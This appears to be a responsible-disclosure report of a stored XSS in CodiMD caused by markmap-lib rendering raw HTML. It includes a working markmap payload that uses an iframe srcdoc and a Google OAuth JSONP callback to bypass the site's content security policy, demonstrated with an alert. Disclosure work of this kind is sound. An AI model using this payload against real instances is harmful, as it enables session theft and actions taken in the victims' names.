Stored XSS via `markmap-lib`

[IceWizard4902]

I have raised an issue to markmap about this vulnerability

Root cause

Codimd uses markmap-lib, as documented here. However, markmap-lib allows for arbitrary HTML to be specified, thanks to the following markdown-it

https://github.com/markmap/markmap/blob/205367a24603dc187f67da1658940c6cade20dce/packages/markmap-lib/src/markdown-it.ts#L7-L11

Proof-of-Concept

The proof of concept for this vulnerability can be found here

Steps to Reproduce

Step 1: Create a note with the following content. The iframe has a srcdoc that bypasses the HackMD CSP

```markmap
- xss: <iframe srcdoc="<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(window.origin)'></script>"></iframe>
```

Step 2: View it and trigger the XSS

Impact

This stored XSS can lead to a account compromise through cookie exfiltration, also the attackers can perform any actions on behalf of the user

[IceWizard4902]

Can I check if there will be any CVE issued for this vulnerability? Thanks!